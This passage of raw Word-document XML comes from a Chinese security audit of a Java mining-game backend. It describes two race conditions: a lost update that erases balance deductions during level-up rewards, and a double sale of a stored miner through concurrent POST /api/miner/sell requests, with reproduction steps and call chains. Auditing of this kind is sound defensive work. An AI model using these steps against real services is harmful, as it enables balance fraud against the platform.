              <w:t xml:space="preserve">        balancePushService.pushBalance(userId);</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攻击场景复现步骤（并发竞态，无传统 HTTP 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前置条件：</w:t>
              <w:br/>
              <w:t xml:space="preserve">  - 攻击者账户拥有 minerLevel &gt; currentLevel 的矿机，</w:t>
              <w:br/>
              <w:t xml:space="preserve">    且该矿机处于充电状态（chargedExpireTime 即将到期）</w:t>
              <w:br/>
              <w:br/>
              <w:t>Step 1：等待定时任务触发</w:t>
              <w:br/>
              <w:t xml:space="preserve">  PowerScheduler 每 60 秒执行 resetExpiredCharging()，</w:t>
              <w:br/>
              <w:t xml:space="preserve">  将过期矿机 isCharged 置 0，触发 recalcUserLevelAndHashRate。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  若 maxLevel &gt; oldLevel，进入 grantUsdtOnLevelUp 分支。</w:t>
              <w:br/>
              <w:br/>
              <w:t>Step 2：并发发起消费/扣款请求</w:t>
              <w:br/>
              <w:t xml:space="preserve">  在 grantUsdtOnLevelUp 执行的时间窗口内（读取 UserAccount 到 save 之间），</w:t>
              <w:br/>
              <w:t xml:space="preserve">  同时发起任何会修改 usdtBalance 的操作（如购买、提现申请等）。</w:t>
              <w:br/>
              <w:br/>
              <w:t>Step 3：利用 Lost Update</w:t>
              <w:br/>
              <w:t xml:space="preserve">  - 若扣款事务先于奖励事务提交：</w:t>
              <w:br/>
              <w:t xml:space="preserve">    奖励事务以旧余额为基础写入，覆盖扣款结果</w:t>
              <w:br/>
              <w:t xml:space="preserve">    → 用户余额 = 旧余额 + 奖励（扣款被抹除，用户获利）</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  - 反之：奖励被覆盖（用户受损，平台账目错误）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：是</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="377"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">权限级别：普通用户（需拥有可触发等级升级的矿机，矿机充电到期时由定时任务自动触发）；若系统中存在其他路径直接触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 HTTP 接口，竞态窗口可被更主动地构造</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 4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受影响调用链（5 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.synthesize → MinerService.java.synthesize → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.grantUsdtOnLevelUp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="379"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.sell → MinerService.java.sell → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.grantUsdtOnLevelUp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="380"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.moveToStorage → MinerService.java.moveToStorage → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.grantUsdtOnLevelUp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.move → MinerService.java.moveToSlot → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.grantUsdtOnLevelUp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="382"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PowerScheduler.java.resetExpiredCharging → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.grantUsdtOnLevelUp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audit_m147_517_synthesize_ctrl-path4of6.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m148_526_sell_ctrl-path5of8.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m151_521_moveToStorage_ctrl-path4of5.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m153_543_move_ctrl-path5of6.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m264_1166_resetExpiredCharging_ctrl-path4of8.md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：MinerService.java#resolveMinerToSell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_19" w:id="19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞18：存储区矿机并发售卖金币双花（TOCTOU Race Condition / Gold Double-Spend）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="383"/>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：存储区矿机并发售卖金币双花</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="384"/>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src/main/java/com/gameBack/mjservice/service/MinerService.java:resolveMinerToSell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="385"/>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386"/>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387"/>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388"/>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resolveMinerToSell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法处理 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（存放处）分支时，开发者自留了一条关键注释：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>"存放处查询无 FOR UPDATE，并发售卖同一序号矿机可双花金币"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。该注释与方法调用（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorageForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）存在语义矛盾——若该 Repository 方法确实在 SQL 层面执行了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT … FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，则应能防止并发读到同一矿机；但注释仍明确描述"无 FOR UPDATE"和"可双花"，表明开发者认为此处的锁机制不完整或存疑。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>核心竞态逻辑：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="389"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者同时发出两个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/miner/sell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=1, slotId=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个并发事务均进入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>resolveMinerToSell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 分支，若 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorageForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 未能在数据库层生效 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>X 锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，则两者读到的存放处矿机列表相同（均含 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>miner_id=N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），排序后均取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>index=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 返回同一个矿机对象（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>id=N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个事务随后均进入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>sell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法体：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">均调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdForUpdate(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 锁定账户（此处有正确的账户行锁，但只能串行写账户，不能防止 miner 被重复消费）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>事务 T1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 先拿到账户锁，执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>account.setGoldBalance(balance + sellPrice)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save(account)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>delete(miner_id=N)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，提交；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="394"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>事务 T2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 随后获得账户锁，读到 T1 已更新的账户余额，再次执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>account.setGoldBalance(newBalance + sellPrice)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，save；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>T2 执行 `delete(miner_id=N)` 时该行已不存在，Hibernate 默认不抛出异常（`DeletedObjectException` 仅在 persist context 冲突时触发，基于已提交事务中不存在的行做删除通常为 0 affected rows 静默成功）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">最终结果：同一枚矿机被"卖出"两次，账户金币净增 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>2 × sellPrice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，但矿机只消失一次，实现 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>金币无中生有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="397"/>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/api/miner/sell</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ↓ TokenAuthFilter      — 校验 Bearer Token，userId 注入 request 属性（不可伪造）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ↓ SignAuthTestFilter   — 校验签名 + nonce（覆盖 /api/miner/**）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ↓ MinerController.sell()</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ↓ MinerService.sell(userId, inStorage=1, slotId=1)</w:t>
              <w:br/>
